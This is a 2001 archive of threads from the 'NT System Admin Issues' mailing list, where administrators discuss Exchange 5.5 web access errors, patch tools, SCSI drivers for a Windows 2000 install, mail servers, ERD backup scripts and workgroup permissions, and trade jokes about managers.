RE: OWA
Make sure you have the correct alias when logging in Make sure you are in the log on locally group Look at your logs to see what is being reported Click on the troubleshooter that comes up when you get a failed to login message Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dave Gushi [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 11:20 PM To: NT System Admin Issues Subject: OWA I am trying to setup my exchange 5.5 server with OWA. I did everything I know how to do I added it form my exchange setup CD. I created a website for it. Any way all I keep getting is an error message that says you are not authorized to view this site I've played around with the security settings and I can't get it to work any ideas? Dave Gushi God Bless America! Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: hfnetchk
Put the facts in front of your boss - how can they say no? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Chris Kim [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 7:48 PM To: NT System Admin Issues Subject: RE: hfnetchk steve, i'll agree w/ you on all that. i'm probably just bitter that my boss won't buy me a copy. Chris Kim IT Engineer The Igneous Group, Inc. 541 Seabright Ave. Santa Cruz, CA 95062 1-831-469-7625 X217 Voice 1-831-460-3979 FAX 1-831-234-8059 Cell mailto:[EMAIL PROTECTED] http://www.igneous.com/ Rock Solid Web Sites -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 4:37 PM To: NT System Admin Issues Subject: RE: hfnetchk Think about how long it takes you to find, download, test, build the install and then install 1 patch. By purchasing the Update Expert software, you are in essence paying a service to find, download, test and build the install. All you have to do is point to the machine and click install. I was able to patch my server with everything including the rollup patches in a few short clicks as opposed to the old way. Saved me time which in this business is money. The low end license is 75 NT or W2K machines - also updates for IIS, SQL, Exchange OS etc... Retail is $1500 but can be lower depending on where you purchase. After I researched products, I found it to be an opportunity I could not pass up - I became a reseller as well. My $.02 - not as a salesperson, but as a administrator, owner and accountant. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Chris Kim [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 6:45 PM To: NT System Admin Issues Subject: RE: hfnetchk update expert is a super cool tool, but mucho$$ (about a grand for 40 client/server license) Chris Kim IT Engineer The Igneous Group, Inc. 541 Seabright Ave. Santa Cruz, CA 95062 1-831-469-7625 X217 Voice 1-831-460-3979 FAX 1-831-234-8059 Cell mailto:[EMAIL PROTECTED] http://www.igneous.com/ Rock Solid Web Sites -Original Message- From: Bob Barnhill [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: hfnetchk Try Update Expert (www.stbernard.com) From: Don Collier (Intermap Denver) [EMAIL PROTECTED] Reply-To: NT System Admin Issues [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Subject: hfnetchk Date: Thu, 27 Sep 2001 15:02:39 -0400 So I ran this cool program, that someone on this list mentioned, and got this list of patches that I need to install. Thankfully not very many at all. I know where to go to get the patches individually, but is there a place to get several of the patches at one time. I also ran that program on other machines and need to get patches for them as well. _ Don Collier Network Administrator Intermap Technologies Inc. Voice: 303-708-0955 x-207 Fax:303-708-0952 [EMAIL PROTECTED] www.intermaptechnologies.com Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ _ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: W2K Pro Install
Title: Message No offense taken are you aware of any problems that may occur when replacing the drivers from MS to Adaptec. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: c.e. gene connor [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:47 PM To: NT System Admin Issues Subject: RE: W2K Pro Install please don't take this the wrong way. I have made my income since 1981 and full time since 1989 from uncle bill. the only reason that you should ever use the drivers that came with windows is!! if you can't locate or have the hardware drivers from the makers of the items at question. they put there drivers in there for the newbies that are doing the installs. most of the time a hardware conflict is cause from drives ect. this comment is only made from someone that makes money from people that don't use manf. drivers or update there drivers after a o/s install. Gene C. aka C.E. Gene Connor Gene's Custom PC Service since 1989 Serving the U.S., Canada London,England >From the start of our nation we've stood for no crap, We've handled the toughest all over the map. Osama Bin Laden, a cowardly try, Hasn't anyone told you Let sleeping Dogs lie? Feel the Sand on your toes, how HOT can it get. Don't celebrate now, it ain't over yet! A fire in the sky, turns the SAND INTO GLASS ! Osama Bin Laden, Kiss my AMERICAN A** -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:23 PM To: NT System Admin Issues Subject: RE: W2K Pro Install Anyone have problems with the MS drivers for the 2940UW in NT 4 Ive got a backup problem that has plagued me for long time and the Adaptec drivers are the only thing I have not replaced (yet). Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Steve Woods [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:24 PM To: NT System Admin Issues Subject: RE: W2K Pro Install So you install Windows 2K using Microsoft drivers? I need my servers up and solid. I'll use the mfg. drivers over MS any day. -Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 5:13 PM To: NT System Admin Issues Subject: RE: W2K Pro Install Adaptec 2940UW drivers are native to W2K. Greg -Original Message- From: Steve Woods [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: W2K Pro Install Have you tried install the MFG. drivers for the SCSI card using F6 during the install? -Original Message- From: Network Issues [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 12:18 PM To: NT System Admin Issues Subject: W2K Pro Install Goodmorning All, I've been working on installing W2K Pro on a test box and I continually receive an error during the setup process. I am able to get to the portion of the CD install where it begins copying files to the hard drive. However, each time at about 17% or 18% of the process I receive an error that a particular file cannot be copied to the hard drive. I can hit retry and the same message reappears. The message further states that there is something wrong with the CD and if the error persists to call MS Support. The test system is a P3/600 with 2 SCSI drives running off of an Adaptec 2940UW controller. I have swapped all of the parts out: SCSI cables, IDE cable for the CD, the actual CD and I've also used 3 different copies of W2K Professional on CD. I really don't want to call MS. Anyone have any suggestions? TIA Ron Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: W2K Pro Install
Title: Message Oh thats was you in the bushes today. They wanted to install modems in each PC for internet access. I about died Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:40 PM To: NT System Admin Issues Subject: RE: W2K Pro Install Don't you love it when you're paid by the hour and you get to a client's site that need 300mb's worth of drivers downloaded and they only have a shared dialup for internet access ;o) Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] -Original Message- From: c.e. gene connor [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 4:47 PM To: NT System Admin Issues Subject: RE: W2K Pro Install please don't take this the wrong way. I have made my income since 1981 and full time since 1989 from uncle bill. the only reason that you should ever use the drivers that came with windows is!! if you can't locate or have the hardware drivers from the makers of the items at question. they put there drivers in there for the newbies that are doing the installs. most of the time a hardware conflict is cause from drives ect. this comment is only made from someone that makes money from people that don't use manf. drivers or update there drivers after a o/s install. Gene C. aka C.E. Gene Connor Gene's Custom PC Service since 1989 Serving the U.S., Canada London,England >From the start of our nation we've stood for no crap, We've handled the toughest all over the map. Osama Bin Laden, a cowardly try, Hasn't anyone told you Let sleeping Dogs lie? Feel the Sand on your toes, how HOT can it get. Don't celebrate now, it ain't over yet! A fire in the sky, turns the SAND INTO GLASS ! Osama Bin Laden, Kiss my AMERICAN A** -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:23 PM To: NT System Admin Issues Subject: RE: W2K Pro Install Anyone have problems with the MS drivers for the 2940UW in NT 4 - I've got a backup problem that has plagued me for long time and the Adaptec drivers are the only thing I have not replaced (yet). Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Steve Woods [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:24 PM To: NT System Admin Issues Subject: RE: W2K Pro Install So you install Windows 2K using Microsoft drivers? I need my servers up and solid. I'll use the mfg. drivers over MS any day. -Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 5:13 PM To: NT System Admin Issues Subject: RE: W2K Pro Install Adaptec 2940UW drivers are native to W2K. Greg -Original Message- From: Steve Woods [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: W2K Pro Install Have you tried install the MFG. drivers for the SCSI card using F6 during the install? -Original Message- From: Network Issues [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 12:18 PM To: NT System Admin Issues Subject: W2K Pro Install Goodmorning All, I've been working on installing W2K Pro on a test box and I continually receive an error during the setup process. I am able to get to the portion of the CD install where it begins copying files to the hard drive. However, each time at about 17% or 18% of the process I receive an error that a particular file cannot be copied to the hard drive. I can hit retry and the same message reappears. The message further states that there is something wrong with the CD and if the error persists to call MS Support. The test system is a P3/600 with 2 SCSI drives running off of an Adaptec 2940UW controller. I have swapped all of the parts out: SCSI cables, IDE cable for the CD, the actual CD and I've also used 3 different copies of W2K Professional on CD. I really don't want to call MS. Anyone have any suggestions? TIA Ron Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: h
RE: SMTP server for W2K
Excuse the ignorance here - but, why would you want your own internal SMTP address as opposed to using the ISP's SMTP server? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: David Miller [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 6:52 PM To: NT System Admin Issues Subject: RE: SMTP server for W2K We use Rocklife MailSite: http://www.mailsite.com/ It has been pretty good software. -Original Message- From: Stephen Chiang [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 12:38 PM To: NT System Admin Issues Subject: SMTP server for W2K Any recommendations for a good mail server program for Win2K? Thanks. Stephen Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mod e=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mod e=0?=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Monitoring email
Not in native form 3rd party product for that. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Neil Harvey [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 10:13 AM To: NT System Admin Issues Subject: Monitoring email Does anyone know if exchange 5.5 sp4 has the ability to scan and monitor emails for certain content. If I can help it I don't want to have to buy a third party product. Neil Harvey MCP, MCP+I, MCSE, CNA IT Manager emw law DDI: +44 (0)1604 666425 Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Quick Question
Its been looping for about an hour. Already sent an email to Stu no response. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Clayton [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 6:27 PM To: NT System Admin Issues Subject: RE: Quick Question Am I the only one getting an email a minute from Garrick? Groupwise huh? Clayton Doige IT Manager MCSE, MCP + I GamedayInternational N.V. Bound in a nutshell, King of infinite space... T: +5 999 736 0309 ext 4537 C: +5 999 563 1845 F: +5 999 733 1259 E: [EMAIL PROTECTED] Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: ERD Scripts
Hey - I never saw this. This is almost as good as being listed in the phone book. Someone else posted that you can copy the rdisk utility form NT 4 to W2K. Has anyone tried that? Now, where's that picture frame .. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 12:06 PM To: NT System Admin Issues Subject: RE: ERD Scripts He needs a fish taco as well. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 7:50 AM To: NT System Admin Issues Subject: ERD Scripts Hey Guys, Steve Clark's (the genius - if I'm ever in the same city as him, I'll buy him a beer) script for putting computers ERD's onto a different server has made me wonder if anyone has some idea of how to do this for Win2K? What I'm talking about is a script that automatically runs an rdisk (which you can't do in Win2K) and then copies the result from the REPAIR directory to a different server... Any ideas? Hmmm? Cheers G. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: W2K pro in a work group
100% correct - as he said, if you want individuals to have specific rights, each device has it's own accounts. It's a real PITA on each device - try to talk them into a low end server to at least share the resources centrally. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 5:58 PM To: NT System Admin Issues Subject: RE: W2K pro in a work group But he did mention that he wants each user to have his own profile and permissions. Greg -Original Message- From: Adil Hindistan [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 3:12 PM To: NT System Admin Issues Subject: RE: W2K pro in a work group We have a workgroup environment for one of our remote offices. You actually figured out what you'll do. Create a user (or use the administrator account) and let everybody logon with this username and password (same password). No more problems. As you know, if you have a workgroup, them the SAM database is local! That means each W2K computer will have its own SAM and it will let access to its resources only if the user, who is trying to acess, is defined in its own SAM database. That's why the above solution will work properly :) Adil Hindistan ICQ: 26477783 -Original Message- From: Mark Pilbeam [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 7:23 PM To: NT System Admin Issues Subject: W2K pro in a work group Hi folks, Excuse my ignorance, and unfortunately I can't test this. How does W2K work in a workgroup. For example. In Windows 98 once the workgroup is configured on a computer, anyone who logs on to the workgroup using that computer is able to access the resources. Is this true for W2K pro. The scenario I am envisaging is this. I join a computer to a workgroup using the Administrator account. Now W2K pro has far better security and each user has or can have their own profiles, permissions etc. If, having been added to a workgroup using the Administrator account, I log on as a user, provided the folders on a remote computer, also part of the same workgroup, are share to the Everyone group, would this new user be able to access those resources without any further administration? Or would I have to add the computer to the work group for each user that logged on to the computer? Thanks mark Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: ERD Scripts
www.clarksupport.com/scripts.htm a work in progress. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Eric Brouwer [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 4:31 PM To: NT System Admin Issues Subject: RE: ERD Scripts Where might one find this script? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 10:50 AM To: NT System Admin Issues Subject: ERD Scripts Hey Guys, Steve Clark's (the genius - if I'm ever in the same city as him, I'll buy him a beer) script for putting computers ERD's onto a different server has made me wonder if anyone has some idea of how to do this for Win2K? What I'm talking about is a script that automatically runs an rdisk (which you can't do in Win2K) and then copies the result from the REPAIR directory to a different server... Any ideas? Hmmm? Cheers G. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Testing 1, 2, 3 - Ignore
Did you hear the wind? I had a tech manager years ago that referred to all networks as LAND's and portables as Labtops. Thought the joke would transfer. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:43 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore No, but he may be trying to setup that LAN -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 5:41 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore Uh huh, trying to set up that LAND aren't you? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:38 PM To: NT System Admin Issues Subject: Testing 1, 2, 3 - Ignore Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Testing 1, 2, 3 - Ignore
That's great - LMAO. I've gotten cold calls from companies looking to see if I can fix their novelle client server from Microsoft. Another client asked if I would install that Microsoft thing from the commercial - the one with the boxes and everyone's at a party - I asked her if she was talking about the data center. She said yes - this was in a hardware store with 2 PC's and a UNIX POS shop. Damm ethics. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:50 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore almost as bad as a mangaler (manager) that I had that constantly told people that we had an AtherNet (can you say ethernet) network running Novel (as in book) Server. I didn't have the heart to tell him that we were actually broken ring... Two more sleeps til Vegas (1) (1) Hi William -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 17:45 To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore Did you hear the wind? I had a tech manager years ago that referred to all networks as LAND's and portables as Labtops. Thought the joke would transfer. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:43 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore No, but he may be trying to setup that LAN -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 5:41 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore Uh huh, trying to set up that LAND aren't you? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:38 PM To: NT System Admin Issues Subject: Testing 1, 2, 3 - Ignore Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Testing 1, 2, 3 - Ignore
Did he work with arcnet once upon a time? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Dave Gushi [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:56 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore This is very funny stuff. It seams the more money some managers make the less they know. I have a VP that thinks the closer he is to the server the better data response he's going to get. Dave Gushi God Bless America! -Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 7:50 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore almost as bad as a mangaler (manager) that I had that constantly told people that we had an AtherNet (can you say ethernet) network running Novel (as in book) Server. I didn't have the heart to tell him that we were actually broken ring... Two more sleeps til Vegas (1) (1) Hi William -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 17:45 To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore Did you hear the wind? I had a tech manager years ago that referred to all networks as LAND's and portables as Labtops. Thought the joke would transfer. Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:43 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore No, but he may be trying to setup that LAN -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 5:41 PM To: NT System Admin Issues Subject: RE: Testing 1, 2, 3 - Ignore Uh huh, trying to set up that LAND aren't you? Steve Clark Clark Systems Support, LLC AVIEN Charter Member Who's watching your network? www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 8:38 PM To: NT System Admin Issues Subject: Testing 1, 2, 3 - Ignore Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Exchange 5.5 and GroupShield
